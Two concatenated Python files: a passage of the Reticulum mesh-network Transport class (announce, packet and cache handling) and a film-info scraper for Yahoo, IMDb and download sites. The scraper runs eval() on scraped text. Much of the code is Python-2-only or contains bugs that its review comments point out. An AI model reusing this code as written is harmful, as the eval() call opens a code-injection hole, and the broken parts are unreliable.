                        # RNS.log("Announce entry retries: "+str(announce_entry[2]), RNS.LOG_INFO)
                        # RNS.log("Max retries: "+str(Transport.PATHFINDER_R), RNS.LOG_INFO)
                        if announce_entry[2] > Transport.PATHFINDER_R:
                            RNS.log("Dropping announce for "+RNS.prettyhexrep(destination_hash)+", retries exceeded", RNS.LOG_DEBUG)
                            # break immediately after pop: only one entry is
                            # dropped per pass (also avoids mutating the dict
                            # mid-iteration).
                            Transport.announce_table.pop(destination_hash)
                            break
                        else:
                            if time.time() > announce_entry[1]:
                                # Exponential backoff in the announce hop count,
                                # plus grace period and random window.
                                announce_entry[1] = time.time() + math.pow(Transport.PATHFINDER_C, announce_entry[4]) + Transport.PATHFINDER_T + Transport.PATHFINDER_RW
                                announce_entry[2] += 1
                                packet = announce_entry[5]
                                announce_data = packet.data
                                announce_identity = RNS.Identity.recall(packet.destination_hash)
                                announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
                                announce_destination.hash = packet.destination_hash
                                # NOTE(review): encode("hex_codec") is
                                # Python-2-only; py3 would need bytes.hex().
                                announce_destination.hexhash = announce_destination.hash.encode("hex_codec")
                                new_packet = RNS.Packet(announce_destination, announce_data, RNS.Packet.ANNOUNCE, header_type = RNS.Packet.HEADER_2, transport_type = Transport.TRANSPORT, transport_id = Transport.identity.hash)
                                new_packet.hops = announce_entry[4]
                                RNS.log("Rebroadcasting announce for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
                                outgoing.append(new_packet)

                    Transport.announces_last_checked = time.time()

            # Cull the packet hashlist if it has reached max size
            while (len(Transport.packet_hashlist) > Transport.hashlist_maxsize):
                Transport.packet_hashlist.pop(0)

        except Exception as e:
            RNS.log("An exception occurred while running Transport jobs.", RNS.LOG_ERROR)
            RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
            traceback.print_exc()

        Transport.jobs_running = False

        for packet in outgoing:
            packet.send()

    @staticmethod
    def outbound(packet):
        """Transmit a packet on every eligible OUT interface.
        Returns True if it went out on at least one interface."""
        # Wait for the job loop to finish its pass before touching state.
        while (Transport.jobs_running):
            sleep(0.01)

        Transport.jobs_locked = True
        packet.updateHash()
        sent = False

        for interface in Transport.interfaces:
            if interface.OUT:
                should_transmit = True
                # Link-bound packets go only over the link's own interface,
                # and never over a closed link.
                if packet.destination.type == RNS.Destination.LINK:
                    if packet.destination.status == RNS.Link.CLOSED:
                        should_transmit = False
                    if interface != packet.destination.attached_interface:
                        should_transmit = False

                if should_transmit:
                    # TODO: Remove
                    RNS.log("Transmitting "+str(len(packet.raw))+" bytes via: "+str(interface), RNS.LOG_EXTREME)
                    RNS.log("Hash is "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_EXTREME)
                    interface.processOutgoing(packet.raw)
                    sent = True

        if sent:
            packet.sent = True
            packet.sent_at = time.time()

            # Only DATA packets get delivery receipts for proof tracking.
            if (packet.packet_type == RNS.Packet.DATA):
                packet.receipt = RNS.PacketReceipt(packet)
                Transport.receipts.append(packet.receipt)

            Transport.cache(packet)

        Transport.jobs_locked = False
        return sent

    @staticmethod
    def packet_filter(packet):
        """Return True when the packet should be processed.
        Keepalive and resource-transfer packets always pass (they may
        legitimately repeat); everything else passes only if its hash
        has not been seen before (duplicate suppression)."""
        # TODO: Think long and hard about this
        if packet.context == RNS.Packet.KEEPALIVE:
            return True
        if packet.context == RNS.Packet.RESOURCE_REQ:
            return True
        if packet.context == RNS.Packet.RESOURCE_PRF:
            return True
        if not packet.packet_hash in Transport.packet_hashlist:
            return True

        return False

    @staticmethod
    def inbound(raw, interface=None):
        """Process a raw frame received on an interface: unpack it, dispatch
        by packet type (announce / link request / data / proof) and update the
        announce, destination, link and receipt tables accordingly."""
        while (Transport.jobs_running):
            sleep(0.1)

        Transport.jobs_locked = True

        packet = RNS.Packet(None, raw)
        packet.unpack()
        packet.updateHash()
        packet.receiving_interface = interface

        RNS.log(str(interface)+" received packet with hash "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_EXTREME)

        # TODO: Rewrite these redundant cache calls
        if Transport.packet_filter(packet):
            Transport.packet_hashlist.append(packet.packet_hash)

            if packet.packet_type == RNS.Packet.ANNOUNCE:
                if RNS.Identity.validateAnnounce(packet):
                    if (packet.transport_id != None):
                        received_from = packet.transport_id

                        # Check if this is a next retransmission from
                        # another node. If it is, we're removing the
                        # announce in question from our pending table
                        if packet.destination_hash in Transport.announce_table:
                            announce_entry = Transport.announce_table[packet.destination_hash]

                            if packet.hops == announce_entry[4]:
                                RNS.log("Heard a local rebroadcast of announce for "+RNS.prettyhexrep(packet.destination_hash), RNS.LOG_DEBUG)
                                announce_entry[6] += 1
                                if announce_entry[6] >= Transport.LOCAL_REBROADCASTS_MAX:
                                    RNS.log("Max local rebroadcasts of announce for "+RNS.prettyhexrep(packet.destination_hash)+" reached, dropping announce from our table", RNS.LOG_DEBUG)
                                    Transport.announce_table.pop(packet.destination_hash)

                            # A neighbour re-announced at hops+1: it took over
                            # propagation, so we can stop retrying ourselves.
                            if packet.hops == announce_entry[4]+1 and announce_entry[2] > 0:
                                now = time.time()
                                if now < announce_entry[1]:
                                    RNS.log("Rebroadcasted announce for "+RNS.prettyhexrep(packet.destination_hash)+" has been passed on to next node, no further tries needed", RNS.LOG_DEBUG)
                                    Transport.announce_table.pop(packet.destination_hash)

                    else:
                        received_from = packet.destination_hash

                    # Check if this announce should be inserted into
                    # announce and destination tables
                    should_add = False
                    packet.hops += 1

                    # First, check that the announce is not for a destination
                    # local to this system, and that hops are less than the max
                    if (not any(packet.destination_hash == d.hash for d in Transport.destinations) and packet.hops < Transport.PATHFINDER_M+1):
                        # NOTE(review): DERKEYSIZE/8 is a float on Python 3 and
                        # would break slicing — py3 needs // here.
                        random_blob = packet.data[RNS.Identity.DERKEYSIZE/8+10:RNS.Identity.DERKEYSIZE/8+20]
                        random_blobs = []
                        if packet.destination_hash in Transport.destination_table:
                            random_blobs = Transport.destination_table[packet.destination_hash][4]

                            # If we already have a path to the announced
                            # destination, but the hop count is equal or
                            # less, we'll update our tables.
                            if packet.hops <= Transport.destination_table[packet.destination_hash][2]:
                                # Make sure we haven't heard the random
                                # blob before, so announces can't be
                                # replayed to forge paths.
                                # TODO: Check whether this approach works
                                # under all circumstances
                                if not random_blob in random_blobs:
                                    should_add = True
                                else:
                                    should_add = False
                            else:
                                # If an announce arrives with a larger hop
                                # count than we already have in the table,
                                # ignore it, unless the path is expired
                                if (time.time() > Transport.destination_table[packet.destination_hash][3]):
                                    # We also check that the announce hash is
                                    # different from ones we've already heard,
                                    # to avoid loops in the network
                                    if not random_blob in random_blobs:
                                        # TODO: Check that this ^ approach actually
                                        # works under all circumstances
                                        RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce due to expired path", RNS.LOG_DEBUG)
                                        should_add = True
                                    else:
                                        should_add = False
                                else:
                                    should_add = False
                        else:
                            # If this destination is unknown in our table
                            # we should add it
                            should_add = True

                        if should_add:
                            now = time.time()
                            retries = 0
                            expires = now + Transport.PATHFINDER_E
                            local_rebroadcasts = 0
                            random_blobs.append(random_blob)
                            retransmit_timeout = now + math.pow(Transport.PATHFINDER_C, packet.hops) + (RNS.rand() * Transport.PATHFINDER_RW)
                            # announce_table entry layout:
                            # [time_heard, retransmit_timeout, retries, received_from, hops, packet, local_rebroadcasts]
                            Transport.announce_table[packet.destination_hash] = [now, retransmit_timeout, retries, received_from, packet.hops, packet, local_rebroadcasts]
                            # destination_table entry layout:
                            # [time_heard, next_hop, hops, expires, random_blobs]
                            Transport.destination_table[packet.destination_hash] = [now, received_from, packet.hops, expires, random_blobs]

            elif packet.packet_type == RNS.Packet.LINKREQUEST:
                for destination in Transport.destinations:
                    if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
                        packet.destination = destination
                        destination.receive(packet)
                        Transport.cache(packet)

            elif packet.packet_type == RNS.Packet.DATA:
                if packet.destination_type == RNS.Destination.LINK:
                    for link in Transport.active_links:
                        if link.link_id == packet.destination_hash:
                            packet.link = link
                            link.receive(packet)
                            Transport.cache(packet)
                else:
                    for destination in Transport.destinations:
                        if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
                            packet.destination = destination
                            destination.receive(packet)
                            Transport.cache(packet)

                            # Prove receipt automatically or via app callback,
                            # depending on the destination's proof strategy.
                            if destination.proof_strategy == RNS.Destination.PROVE_ALL:
                                packet.prove()
                            elif destination.proof_strategy == RNS.Destination.PROVE_APP:
                                if destination.callbacks.proof_requested:
                                    if destination.callbacks.proof_requested(packet):
                                        packet.prove()

            elif packet.packet_type == RNS.Packet.PROOF:
                if packet.context == RNS.Packet.LRPROOF:
                    # This is a link request proof, forward
                    # to a waiting link request
                    for link in Transport.pending_links:
                        if link.link_id == packet.destination_hash:
                            link.validateProof(packet)
                elif packet.context == RNS.Packet.RESOURCE_PRF:
                    for link in Transport.active_links:
                        if link.link_id == packet.destination_hash:
                            link.receive(packet)
                else:
                    if packet.destination_type == RNS.Destination.LINK:
                        for link in Transport.active_links:
                            if link.link_id == packet.destination_hash:
                                packet.link = link
                                # plaintext = link.decrypt(packet.data)

                    # TODO: Make sure everything uses new proof handling
                    # Explicit proofs carry the proved packet's hash up front;
                    # implicit proofs must be tested against every receipt.
                    # NOTE(review): HASHLENGTH/8 — same py3 float-slice issue.
                    if len(packet.data) == RNS.PacketReceipt.EXPL_LENGTH:
                        proof_hash = packet.data[:RNS.Identity.HASHLENGTH/8]
                    else:
                        proof_hash = None

                    for receipt in Transport.receipts:
                        receipt_validated = False
                        if proof_hash != None:
                            # Only test validation if hash matches
                            if receipt.hash == proof_hash:
                                receipt_validated = receipt.validateProofPacket(packet)
                        else:
                            # In case of an implicit proof, we have
                            # to check every single outstanding receipt
                            receipt_validated = receipt.validateProofPacket(packet)

                        # NOTE(review): remove-during-iteration skips the next
                        # receipt in the list.
                        if receipt_validated:
                            Transport.receipts.remove(receipt)

        Transport.jobs_locked = False

    @staticmethod
    def registerDestination(destination):
        # Track only inbound destinations; outbound ones need no dispatch.
        destination.MTU = RNS.Reticulum.MTU
        if destination.direction == RNS.Destination.IN:
            Transport.destinations.append(destination)

    @staticmethod
    def registerLink(link):
        # Initiated links start pending (await proof); incoming ones are
        # active immediately.
        RNS.log("Registering link "+str(link), RNS.LOG_DEBUG)
        if link.initiator:
            Transport.pending_links.append(link)
        else:
            Transport.active_links.append(link)

    @staticmethod
    def activateLink(link):
        # Promote a pending link to active once its proof validated.
        RNS.log("Activating link "+str(link), RNS.LOG_DEBUG)
        if link in Transport.pending_links:
            Transport.pending_links.remove(link)
            Transport.active_links.append(link)
            link.status = RNS.Link.ACTIVE
        else:
            RNS.log("Attempted to activate a link that was not in the pending table", RNS.LOG_ERROR)

    @staticmethod
    def shouldCache(packet):
        # TODO: Implement sensible rules for which
        # packets to cache
        if packet.context == RNS.Packet.RESOURCE_PRF:
            return True

        return False

    @staticmethod
    def cache(packet):
        """Write the packet's raw bytes to the cache dir, keyed by hash.
        Best-effort: failures are logged, never raised."""
        if RNS.Transport.shouldCache(packet):
            try:
                packet_hash = RNS.hexrep(packet.getHash(), delimit=False)
                # NOTE(review): packet.raw is wire data — py3 would need "wb".
                file = open(RNS.Reticulum.cachepath+"/"+packet_hash, "w")
                file.write(packet.raw)
                file.close()
                RNS.log("Wrote packet "+packet_hash+" to cache", RNS.LOG_EXTREME)
            except Exception as e:
                RNS.log("Error writing packet to cache", RNS.LOG_ERROR)
                RNS.log("The contained exception was: "+str(e))

    @staticmethod
    def cache_request_packet(packet):
        # Serve a CACHE_REQUEST: look up the requested hash on disk.
        if len(packet.data) == RNS.Identity.HASHLENGTH/8:
            packet_hash = RNS.hexrep(packet.data, delimit=False)
            # TODO: There's some pretty obvious file access
            # issues here. Make sure this can't happen
            path = RNS.Reticulum.cachepath+"/"+packet_hash
            if os.path.isfile(path):
                file = open(path, "r")
                raw = file.read()
                file.close()
                packet = RNS.Packet(None, raw)
                # TODO: Implement outbound for this

    @staticmethod
    def cache_request(packet_hash):
        """Fetch a packet by hash: replay it from the local cache when
        present, otherwise send a CACHE_REQUEST into the network."""
        RNS.log("Cache request for "+RNS.prettyhexrep(packet_hash), RNS.LOG_EXTREME)
        path = RNS.Reticulum.cachepath+"/"+RNS.hexrep(packet_hash, delimit=False)
        if os.path.isfile(path):
            file = open(path, "r")
            raw = file.read()
            Transport.inbound(raw)
            file.close()
        else:
            cache_request_packet = RNS.Packet(Transport.transport_destination(), packet_hash, context = RNS.Packet.CACHE_REQUEST)

    @staticmethod
    def transport_destination():
        # TODO: implement this
        pass

    @staticmethod
    def exitHandler():
        # Persist the duplicate-detection hashlist on shutdown (best-effort).
        try:
            packet_hashlist_path = RNS.Reticulum.configdir+"/packet_hashlist"
            # NOTE(review): msgpack output is bytes — py3 would need "wb".
            file = open(packet_hashlist_path, "w")
            file.write(umsgpack.packb(Transport.packet_hashlist))
            file.close()
        except Exception as e:
            RNS.log("Could not save packet hashlist to disk, the contained exception was: "+str(e), RNS.LOG_ERROR)
# ===== scrape_film.py =====
#!/usr/bin/env python3

from requests import Session
from urllib.parse import unquote as decode_url
from bs4 import BeautifulSoup
from re import findall, search, match
from string import ascii_lowercase as ELetters
import threading
from time import sleep, time
import json


class Scraper:
    """Thin wrapper around a requests Session used by all scrapers:
    fetches a page and exposes it as a BeautifulSoup document."""
    def __init__(self):
        super(Scraper, self).__init__()
        self.__setup()
        ## args will be submit latter
        # Raw HTML of the last successful fetch (None until get() succeeds).
        self.src = None

    def __setup(self):
        # One shared session with a common desktop user agent.
        self.session = Session()
        self.session.headers.update({
            ## very common user_agent
            'User_agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'
        })

    def get(self, link):
        # Fetch a URL; store and return the body only on HTTP 200,
        # otherwise return None.
        r = self.session.get(link) # , timeout= 3
        if r.status_code == 200:
            self.src = r.text
            return self.src

    def html_soup(self):
        # Parse the last fetched page; an empty soup when nothing fetched.
        if self.src:
            return BeautifulSoup(self.src, 'html.parser')
        return BeautifulSoup('', 'html.parser')


class ScrapeWebsite:
    """Shared helpers for the per-site scrapers.

    Websites List:
        - search.yahoo.com/search?p=last+tango+in+paris
        - imdb.com
        - wikipedia.org
        - allmovie.com
        - rottentomatoes.com
        - yts.am
        - elcinema.com
    """
    def __init__(self):
        super(ScrapeWebsite, self).__init__()
        # Domains recognised as trusted info sources.
        self.domains = ['wikipedia', 'imdb', 'rottentomatoes']

    def shift(self, lst):
        # Pop and return the first element (mutates lst).
        x = lst[0]
        lst.remove(x)
        return x

    def get_host(self, url):
        # 'https://a.b.c/x' -> 'a.b.c'
        return url.split('//')[-1].split('/', 1)[0]

    def get_domain(self, host):
        # 'www.imdb.com' -> 'imdb'
        return host.split('.')[-2]

    def defined_website(self, link):
        # NOTE(review): self.domain / self.host do not exist — these should
        # be self.get_domain / self.get_host; calling this raises
        # AttributeError as written.
        return self.domain(self.host(link)).lower() in self.domains

    def convert_length(self, length, to='m'):
        ## lenght must be 15h 13m
        # Converts a duration string like '2h 15m' to a single unit by
        # rewriting units into arithmetic and evaluating it.
        # NOTE(review): eval() on text derived from scraped pages is a code
        # injection risk; consider parsing digits explicitly.
        convert_map = {
            's':{'h': '*60*60 +', 'm': '*60 +', 's': '*1 +'},
            'm':{'h': '*60 +' , 'm': '*1 +' , 's': '/60 +'},
            'h':{'h': '*1 +' , 'm': '/60 +', 's': '/(60*60) +'},
        }
        my_map = convert_map[to]
        for unit, equivelant in my_map.items():
            length = length.replace(unit, equivelant)
        length = length.rstrip('+')
        try:
            return str(eval(length)) + to
        except:
            # Malformed input -> False (bare except kept as-is).
            return False

    def englishName(self, filmName):
        # True when the title starts with an ASCII letter.
        return filmName[0].lower() in ELetters

    def get_soup(self, link):
        # Fetch a URL and return it parsed.
        scraper = Scraper()
        scraper.get(link)
        return scraper.html_soup()


class Wikipedia(ScrapeWebsite):
    """Wikipedia scraper (stub — external_sites not implemented yet)."""
    def __init__(self, arg):
        super(Wikipedia, self).__init__()
        self.arg = arg

    def external_sites(self):
        pass

    ## Wikipedia
    def wikipedia(self, link):
        ## get data and soup it
        soup = self.get_soup(link)
        return {
            'sites': self.external_sites(),
        }


class IMDB(ScrapeWebsite):
    """Scrapes a film's title page on imdb.com (selectors match the
    pre-2020 IMDb page layout)."""
    def __init__(self):
        super(IMDB, self).__init__()
        # Soup of the film's title page, set by imdb().
        self.soup = None

    def name(self):
        # Title from the og:title meta tag, stripped of the '(year)' suffix.
        n = self.soup.select_one('meta[property="og:title"]')
        n = n['content']
        ## ptrn "name (year)"
        ## so i only remove and join with '(' cus name may contain () itself
        return '('.join(n.split('(')[:-1]).strip()

    def year(self):
        # Last parenthesised token of the <title> text.
        txt = self.soup.title.text
        find = findall(r'\((.+)\)',txt)
        return find and find[-1]

    def mpaa(self):
        # Leading uppercase token of the subtext bar (e.g. 'PG-13').
        txt = self.soup.select_one('.subtext').text.lstrip()
        ptrn = r'[A-Z]+[-\dA-Z]*'
        find = match(ptrn, txt)
        return find and find.group()

    def length(self):
        # Runtime from the <time> element in the subtext bar.
        elm = self.soup.select_one('div.title_wrapper .subtext')
        return elm.time.text.strip()

    def trailer(self):
        # Trailer page link, thumbnail, and (via a second fetch) the
        # direct video URL embedded in the player page's JSON.
        a = self.soup.select_one('div.slate_wrapper .slate a')
        link = a and 'https://imdb.com' + a['href'] or ''
        video_src, img_src = '', ''
        if link:
            img_src = a.img.get('src') or ''
            s = Scraper()
            src = s.get(link)
            video_src = search(r'"videoUrl":"(.+?)"', src)
            video_src = video_src and video_src.group(1).replace('\\u002F', '/') or ''
        return {
            'video_src': video_src,
            'link': link,
            'img_src': img_src
        }

    def poster(self):
        img = self.soup.select_one('div.poster').img
        return img['src']

    def category(self):
        # Genre links in the subtext bar; last anchor (release date) dropped.
        a = self.soup.select('div.title_wrapper .subtext a')
        return [i.text for i in a][:-1]

    def rating(self):
        # The strong element's title reads like '8.8 based on 1,234,567 ...'.
        elm = self.soup.select_one('div.imdbRating .ratingValue strong')
        txt = elm['title']
        rating, count = findall(r'[,\.\d]+', txt)
        return {'rating': rating, 'count': count}

    def brief(self):
        txt = self.soup.select_one('.plot_summary_wrapper .plot_summary .summary_text').text.strip()
        return txt

    def country(self):
        # Scan the details blocks for the one starting with 'country'.
        # Returns None when absent (implicit).
        elms = self.soup.select('div#titleDetails .txt-block')
        txts = [i.text.lower().split() for i in elms]
        for txt in txts:
            if 'country' in txt[0]:
                return [i for i in txt[1:] if match(r'\w+', i)]

    def language(self):
        # Same scan as country(), for the 'language' block.
        elms = self.soup.select('div#titleDetails .txt-block')
        txts = [i.text.lower().split() for i in elms]
        for txt in txts:
            if 'language' in txt[0]:
                return [i for i in txt[1:] if match(r'\w+', i)]

    def cast(self):
        # Cast table rows -> tuple of dicts; rows without exactly 4 cells
        # (headers/separators) are skipped.
        rows = self.soup.select('.cast_list tr')
        data = ()
        for row in rows[1:]:
            ## clms are tds
            clms = row.select('td')
            if len(clms) != 4:
                continue
            photo, name, _, chracter = clms
            ## made data in list cus i care with order
            data += ({
                'name': name.text.strip(),
                'imdb_link': name.a and 'imdb.com'+name.a['href'] or '',
                'chracter': ' '.join(chracter.text.split()),
                'photo': photo.img.get('loadlate') or photo.img['src']
            },)
        return data

    def reviews(self):
        pass

    def prizes_won(self):
        pass

    def prizes_nomenee(self):
        pass

    def awards(self):
        # NOTE(review): 'link' is read before assignment — calling this
        # raises UnboundLocalError; unfinished stub.
        link = link + '/awards'
        pass

    def search(self, filmName):
        # Query IMDb's find page and return the first title result URL,
        # or None when nothing matched.
        link = 'https://www.imdb.com/find?q=%s&s=tt'
        link = link % filmName.lower().replace(' ', '+')
        ## scrape src
        soup = self.get_soup(link)
        anchor = soup.select_one('table.findList tr.findResult a')
        # path = '/'.join(anchor['href'].split('/')[:-1])
        path = anchor and anchor['href']
        return path and 'https://www.imdb.com' + path or None

    ## return IMDB all possible data
    def imdb(self, filmName=None, link=None):
        # Entry point: either a direct title-page link or a name to search.
        link = link or self.search(filmName)
        if not link:
            return None
        ## get data and soup it
        self.soup = self.get_soup(link)
        ## find data
        return {
            'name' : self.name(),
            'year' : self.year(),
            'mpaa' : self.mpaa(),
            'length' : self.length(),
            'trailer' : self.trailer(),
            'poster' : self.poster(),
            'category': self.category(),
            'rating' : {'imdb': self.rating()},
            'brief_en': self.brief(),
            'country' : self.country(),
            'language': self.language(),
            'cast' : self.cast(),
            # 'reviews' : self.reviews(),
            # 'prizes-won': self.prizes_won(),
            # 'prizes-nomenee': self.prizes_nomenee(),
        }


class Yahoo(ScrapeWebsite):
    """Scrapes the Yahoo search results page for a film: the right-hand
    knowledge panel when Yahoo recognised the title, otherwise the
    left-hand organic results."""
    def __init__(self):
        super(Yahoo, self).__init__()
        ## general area of data
        # Holds whichever page region is currently being scraped.
        self.soup = None

    def extract_redirect_link_yahoo(self, link):
        # Yahoo wraps outbound links in an r.search.yahoo.com redirect;
        # unwrap the real target URL from the RU= parameter.
        ## check its yahoo
        host = self.get_host(link)
        if 'yahoo' in host:
            ## start with 'r' this is redirect else skip it
            if 'r' == host.split('.', 1)[0]:
                ## this is regular vars in link
                link = decode_url(link.split('/RK=', 1)[0].split('RU=', 1)[-1])
        return link

    ## start functions only for right area ##
    def trailer(self):
        iframe = self.soup.iframe
        return iframe and iframe['data-src'] or None

    def name(self):
        ## first p always contain name
        return self.soup.select_one('div.compImageProfile p').text

    def mpaa(self):
        ## mpaa always first span in second p or its not exist
        spans = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')
        return len(spans) == 2 and spans[0].text or None

    def year(self):
        ## year - type - length
        spanText = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')[-1].text
        ptrn = r'\d\d\d\d'
        matchedData = search(ptrn, spanText)
        return matchedData and matchedData.group() or None

    def category(self):
        # Capitalised word in the 'year - type - length' span.
        spanText = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')[-1].text
        ptrn = r'[A-Z][a-z]+'
        matchedData = search(ptrn, spanText)
        return matchedData and matchedData.group() or None

    def length(self):
        # Runtime like '2h 15m' in the same span.
        spanText = self.soup.select_one('div.compImageProfile').select('p:nth-of-type(2) span')[-1].text
        ptrn = r'\dh [12345]{0,1}[0-9]m'
        matchedData = search(ptrn, spanText)
        return matchedData and matchedData.group() or None

    def poster(self):
        a = self.soup.select_one('div.compImageProfile').a
        return a and a['href']

    def brief(self):
        textElms = self.soup.select('div.compText > p')
        ## brief must be longest text
        mx = 0
        brief = ''
        for elm in textElms:
            l = len(elm.text)
            # Longest paragraph that carries a link ('more' anchor) wins;
            # the anchor itself is stripped from the text.
            if l > mx and elm.a:
                elm.a.replaceWith('')
                brief = elm.text.rstrip()
                mx = l
        return brief

    def sites(self):
        ## contain links to wiki imdb rotten-tomato
        ulElms = self.soup.select('ul')
        sites = {}
        ## i wanna last ul
        ulElm_a = self.soup.select('ul:nth-of-type(%i) li a[title]' % len(ulElms))
        [sites.update({
            a['title'].lower(): self.extract_redirect_link_yahoo(a['href'])
        }) for a in ulElm_a]
        return sites
    ## End functions only for right area ##

    ## start Left Area ##
    def leftAreaData(self):
        ## list elms in left side
        # self.soup is a list of result <li> elements here (set by yahoo()).
        left_li = self.soup
        sites = {}
        for li in left_li:
            ## link and title all in a elm
            a = li.h3.a
            title = (a and a.text) or ''
            link = (a and a['href']) or ''
            if link:
                link = self.extract_redirect_link_yahoo(link)
                host = self.get_host(link)
                domain = self.get_domain(host).lower()
                # Keep only trusted domains (wikipedia/imdb/rottentomatoes).
                if domain in self.domains:
                    sites.update({domain: {'title': title, 'link': link}})
        return sites
    ## End Left Area ##

    ## return Yahoo all possible data
    def yahoo(self, filmName):
        ## link
        link = 'https://search.yahoo.com/search?p=%s'
        link = link % filmName.lower().replace(' ', '+')
        ## get data and soup it
        soup = self.get_soup(link)
        ## find data
        right = soup.select_one('div#right div')
        ## right might be exist but not refering to my movie
        ## movies always have year also it may be a series
        right_text = right and right.text.lower() or ''
        first_cmponent_text = right and right.select_one('div.compImageProfile').text or ''
        is_years_in_text = bool( search(r'(19[5-9][0-9]|20[01][0-9])', first_cmponent_text) )
        is_valid = is_years_in_text or ('imdb' in right_text) or ('created by' in right_text)
        if is_valid:
            self.soup = right
            return {
                'trailer': self.trailer(),
                'name': self.name(),
                'mpaa': self.mpaa(),
                'year': self.year(),
                'category': self.category(),
                'length': self.length(),
                'poster': self.poster(),
                'brief_en': self.brief(),
                'sites': self.sites()
            }
        else:
            ## yahoo may not detect this as a movie from first
            ## so search again and add movie at the end if u not added it before
            if (not filmName.endswith('movie')) and self.englishName(filmName):
                return self.yahoo('%s movie' % filmName)
            ## if u dont find in the right side
            ## start see if there is useful data in left
            self.soup = soup.select('div#left div#main div#web > ol > li')
            return {'extra-sites': self.leftAreaData()}


class Download(ScrapeWebsite):
    """Searches a configured list of download sites (loaded from a JSON
    config) for pages matching the film's name and year, one thread per
    site, collecting matching URLs into self.data."""
    def __init__(self, FilmInformation):
        super(Download, self).__init__()
        # Dict of film facts built by Film (name, year, ...).
        self.FilmInformation = FilmInformation
        # Results, filled concurrently by __searchHelper__ threads.
        self.data = {}
        import os
        # NOTE(review): debug leftover — prints the working directory.
        os.system('pwd')
        # Per-site search config: url, search link template, selector,
        # query fields, and a 'return' template dict.
        with open('app/scripts/scrapped-websites.json') as f:
            self.websites = json.loads(f.read())

    def clean_spaces(self, text):
        '''
        remove tabs and lines and many spaces
        replace all with one space
        '''
        return ' '.join( findall(r'\S+',text) )

    def match_year(self, text):
        ## match 1950 to 1999
        ## match 2000 to 2019
        # Returns None when no year is present in the text at all,
        # which callers treat as "no evidence against a match".
        year_ptrn= r'(19[5-9][0-9]|20[01][0-9])'
        found = search(year_ptrn, text)
        found = found and found.group()
        film_year = str(self.FilmInformation['year'])
        return found and found == film_year

    def match_name(self, text):
        # Every word of the film's name must appear in the text.
        ptrn = r'\w+'
        film_name = findall(ptrn, self.FilmInformation['name'].lower())
        matches = findall(ptrn, text.lower())
        for word in film_name:
            if not word in matches:
                return False
        return True

    def clean_not_matched(self, results):
        # Keep results whose text matches the name, and whose year either
        # matches or is absent (match_year -> None).
        cleaned = ()
        for result in results :
            txt = result.text
            is_year = self.match_year(txt)
            is_name = self.match_name(txt)
            if is_name:
                if is_year or is_year == None:
                    cleaned += (result, )
        return cleaned

    def __searchHelper__(self, name, site):
        # Thread worker: run one site's search and record matched URLs.
        ## build search url
        query = ' '.join([self.FilmInformation[i] for i in site['search']['search_query']])
        search_url = site['url'] + site['search']['link'] % query
        ## scrape it
        soup = self.get_soup(search_url)
        ## get search results
        results = soup.select( site['search']['selector'] )
        ## clean the results get matched
        results = self.clean_not_matched(results)
        if results:
            ## extract url and text
            urls = []
            txts = []
            for elm in results:
                # txts.append(elm.text)
                txts.append( self.clean_spaces( elm.text ) )
                if elm.name != 'a':
                    elm = elm.a
                url = elm.get('href') or ''
                # Resolve site-relative links against the site root.
                url = (url.startswith('/') and site['url'] + url) or url
                urls.append( url )
            ## update my data
            site['search']['return'].update({
                'film_url': urls,
                'search_text': txts,
                'zipped': list(zip(urls, txts))
            })
            self.data[name] = site['search']['return']

    def search(self,websites=None):
        # Fan out one thread per site, then poll up to ~5s for either all
        # threads to finish or 5 sites' worth of results.
        # filmName = self.FilmInformation.get('user-query')
        ## can't put default using self
        websites = websites or self.websites
        for name, site in websites.items():
            thread = threading.Thread(target=self.__searchHelper__, args=(name, site))
            # thread.daemon = 1
            # thread.setName(name)
            thread.start()
        loop = 0
        while (len(threading.enumerate()) > 1) and (len(self.data) < 5):
            print(loop,len(threading.enumerate()), len(self.data))
            if loop >= 10:
                break
            sleep(0.5)
            loop += 1
        return self.data


class Film:
    """Aggregates all available data about one film: Yahoo knowledge
    panel, IMDb title page, and download-site search results."""
    def __init__(self, filmName):
        super(Film, self).__init__()
        self.name = filmName
        # Result skeleton; fields are filled in by build().
        self.info = {
            'user-query': self.name,
            ## main data
            'name' : None,
            'year' : None,
            'mpaa' : None,
            'length' : None,
            'poster' : None,
            'category': None,
            'rating' : None,
            'trailer' : None,
            'brief_en': None,
            'brief_ar': None,
            ## more data
            'country' : None,
            'language': None,
            'cast' : None,
            'reviews' : None,
            'prizes_won': None,
            'prizes_nomenee': None,
            ## download
            'torrent' : None,
            'download': None,
            'subtitle': None,
        }

    def information(self):
        '''search in yahoo, imdb, other possibles'''
        imdb = IMDB()
        yahoo = Yahoo()
        yahoo_data = yahoo.yahoo(self.name)
        ## try if data got from right area (trusted) do somthing
        ## except doing somthng else
        try:
            sites = yahoo_data.pop('sites')
            self.info.update(yahoo_data)
            imdb_url = sites.get('imdb')
        except KeyError as e:
            #imdb_url = yahoo_data[ 'extra-sites' ].get('imdb')['link']
            imdb_url = None
            pass
        # Prefer the IMDb link Yahoo found; fall back to IMDb's own search.
        imdb_data = (imdb_url and imdb.imdb(link = imdb_url)) or imdb.imdb(filmName= self.name)
        self.info.update(imdb_data)

    def download_w(self):
        '''
        get download data from websites
        (arabic sites with subtitle etc)
        '''
        ## filter depend on self.info
        download = Download( self.info )
        data = download.search()
        self.info['download'] = data

    def build(self):
        # Full pipeline: metadata first (download search needs name/year).
        self.information()
        self.download_w()
        return self.info


# if __name__ == '__main__':
#     filmName = 'fight club'
#     film = Film(filmName)
#     film.build()
#     from pprint import pprint
#     pprint(film.info)

# f = Film('aquaman')
# f.build()
# info = f.info
# download = info.pop('download')
# for k,v in info.items():
#     print(k, ': ', v)
# for k,v in download.items():
#     print(k, '\n\t' , v['film_url'])

# from json import dumps
